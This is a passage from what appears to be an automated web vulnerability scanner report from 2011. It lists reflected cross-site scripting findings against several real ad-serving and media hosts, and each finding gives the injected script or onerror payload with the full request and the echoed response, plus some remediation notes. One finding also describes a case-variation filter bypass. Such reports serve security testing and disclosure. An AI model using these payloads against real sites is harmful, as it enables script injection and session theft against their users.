Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 15 May 2011 21:21:46 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31409

lpConnLib.Process({"ResultSet": {"lpCallId":"152897602799-290051536113","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16601155425835'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

5.103. http://serv.adspeed.com/ad.php [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be3d"><script>alert(1)</script>0c2f8c115a9 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad.php?do=html&zid=3253&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:56 GMT
Server: AdSpeed/s3
Content-Length: 400

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-1&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9" alt="i" />
...[SNIP]...

5.104. http://serv.adspeed.com/ad.php [wd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e was submitted in the wd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ad.php?do=html&zid=3253&wd=4686c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:48 GMT
Server: AdSpeed/s3
Content-Length: 400

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-1&wd=4686c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e&ht=60" alt="i" />
...[SNIP]...

5.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 4a6bd<script>alert(1)</script>695fd5a77c8 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb04a6bd<script>alert(1)</script>695fd5a77c8 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89581
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:59 GMT
Connection: close

plcb04a6bd<script>alert(1)</script>695fd5a77c8('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

5.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e174a><img%20src%3da%20onerror%3dalert(1)>4ecb572effa was submitted in the plckcommentonkey parameter. This input was echoed as e174a><img src=a onerror=alert(1)>4ecb572effa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.bloge174a><img%20src%3da%20onerror%3dalert(1)>4ecb572effa&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 34494
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:32 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_10078\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"169725.bloge174a><img src=a onerror=alert(1)>4ecb572effa\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a7b44><img%20src%3da%20onerror%3dalert(1)>0f3978d13fc was submitted in the plckcommentonkeytype parameter. This input was echoed as a7b44><img src=a onerror=alert(1)>0f3978d13fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=articlea7b44><img%20src%3da%20onerror%3dalert(1)>0f3978d13fc&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 34817
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:15 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
_comments_79209\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"169725.blog\" commentOnKeyType=\"articlea7b44><img src=a onerror=alert(1)>0f3978d13fc\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.108. http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.channelintelligence.com
Path:   /pages/prices.asp

Issue detail

The value of the ssku request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c9"%3balert(1)//59b4d9d7a55 was submitted in the ssku parameter. This input was echoed as c34c9";alert(1)//59b4d9d7a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/prices.asp?nrgid=1864&ssku=98285c34c9"%3balert(1)//59b4d9d7a55 HTTP/1.1
Host: sony.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA-94CF-AEFC-64AD-028BB2019E0D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13478
Cache-Control: public, max-age=3600
Expires: Sun, 15 May 2011 21:26:50 GMT
Date: Sun, 15 May 2011 20:26:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
{}
function Window_onResize(){}
function ShowMailForm(rnSCID,rnCTID,rnLocID){
   var sUrl=gsOUrl+'/mailform.asp?cii_nSCID='+rnSCID+'&cii_nCTID='+rnCTID+"&cii_sZip=&cii_nIID=-1&cii_sSKU="+escape("98285c34c9";alert(1)//59b4d9d7a55").replace("+","%2B")+"&cii_nVID=&cii_nLocID="+rnLocID+"&cii_nRGID=1864&cii_nPGID=0&cii_nRadius=15";
   document.location=sUrl;
}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVSt
...[SNIP]...

5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tt.omtrdc.net
Path:   /m2/sony/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 649db<script>alert(1)</script>2be9bd4e51a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox649db<script>alert(1)</script>2be9bd4e51a&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: sony.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 308
Date: Sun, 15 May 2011 21:21:23 GMT
Server: Test & Target

mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).cancelTimeout();mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).setOff
...[SNIP]...

5.110. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b7073<script>alert(1)</script>6a1a3f5c872 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psnb7073<script>alert(1)</script>6a1a3f5c872&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 204
Date: Sun, 15 May 2011 20:27:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbox_psnb7073<script>alert(1)</script>6a1a3f5c872',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");

5.111. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload f5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7 was submitted in the mbox parameter. This input was echoed as f5393<img src=a onerror=alert(1)>cf7112fc6c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20eventf5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sun, 15 May 2011 20:28:46 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: eventf5393<img src=a onerror=alert(1)>cf7112fc6c7', 0).setOffer(new mboxOfferDefault()).loaded();}

5.112. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 4483c<script>alert(1)</script>33d87b448fc was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=04483c<script>alert(1)</script>33d87b448fc&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Sun, 15 May 2011 20:28:48 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: event', 04483c<script>alert(1)</script>33d87b448fc).setOffer(new mboxOfferDefault()).loaded();}

5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b554"%3balert(1)//30a094dd635 was submitted in the action parameter. This input was echoed as 2b554";alert(1)//30a094dd635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD2b554"%3balert(1)//30a094dd635&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:19:53 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD2b554";alert(1)//30a094dd635";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var
...[SNIP]...

5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30707"%3balert(1)//ccec8b5486e was submitted in the cwadformat parameter. This input was echoed as 30707";alert(1)//ccec8b5486e in the application's response.

